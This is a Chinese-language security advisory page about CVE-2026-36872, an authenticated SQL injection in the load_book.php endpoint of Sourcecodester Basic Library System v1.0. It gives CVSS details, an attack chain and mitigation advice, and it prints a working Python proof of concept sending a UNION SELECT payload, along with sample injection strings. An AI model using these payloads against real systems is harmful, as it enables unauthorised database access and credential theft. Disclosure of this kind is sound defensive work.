IPBUF安全漏洞报告
English
CVE-2026-36872 CVSS 2.7 低危

CVE-2026-36872: Basic Library System SQL注入漏洞

披露日期: 2026-04-13
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-36872
漏洞类型
SQL注入
CVSS评分
2.7 低危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
Sourcecodester Basic Library System

相关标签

SQL注入CVE-2026-36872SourcecodesterWeb安全高权限利用

漏洞概述

Sourcecodester Basic Library System v1.0 版本在 /librarysystem/load_book.php 接口存在 SQL 注入漏洞。由于该系统未对用户输入进行充分的过滤和验证,攻击者可通过构造恶意的 SQL 语句操纵数据库查询。尽管该漏洞利用需要高权限,但成功利用后可能导致数据库敏感信息泄露,对系统机密性造成影响。

技术细节

该漏洞源于 Sourcecodester Basic Library System v1.0 在处理 /librarysystem/load_book.php 的请求时,存在不安全的数据库查询方式。应用程序直接将用户提交的参数拼接到 SQL 查询语句中,而未使用参数化查询或输入过滤机制。攻击者需要具备高权限(PR:H),如管理员或已认证用户账号,才能访问该漏洞接口。利用时,攻击者可以在参数字段中注入 SQL 语法(如 ' OR '1'='1 或 UNION SELECT),从而篡改原始查询逻辑。通过盲注或联合查询技术,攻击者可以提取数据库中的表结构、用户凭证或其他敏感数据。

攻击链分析

STEP 1
侦察与发现
攻击者识别目标运行的是 Sourcecodester Basic Library System v1.0,并确认存在 load_book.php 接口。
STEP 2
获取权限
由于 CVSS 向量要求高权限(PR:H),攻击者首先需要通过钓鱼、暴力破解或利用其他漏洞获取一个有效的管理员或高权限用户账号。
STEP 3
漏洞利用
攻击者使用高权限会话访问 /librarysystem/load_book.php,并在参数中注入恶意 SQL 代码(如 UNION SELECT)以提取数据库信息。
STEP 4
数据窃取
分析应用程序返回的响应,获取数据库结构及敏感数据(如用户名、密码哈希等),可能导致进一步的身份伪造。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL configuration target_url = "http://target-ip/librarysystem/load_book.php" # SQL Injection Payload to test vulnerability # This payload attempts to concatenate the database version with the original query payload = "1' UNION SELECT 1, version(), 3--+" # Parameters to be sent params = { "book_id": payload # Assuming 'book_id' is the vulnerable parameter } # Headers to simulate a legitimate browser request headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Cookie": "PHPSESSID=admin_session_id" # Requires High Privilege session } try: response = requests.get(target_url, params=params, headers=headers, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response snippet:") print(response.text[:500]) # Inspect response for database errors or leaked data except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}")

影响范围

Sourcecodester Basic Library System 1.0

防御指南

临时缓解措施
建议立即检查并修改 /librarysystem/load_book.php 文件的源代码,确保所有数据库查询都使用参数化查询。在未修复前,应限制对系统的访问权限,并加强网络监控,检测异常的数据库查询请求。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表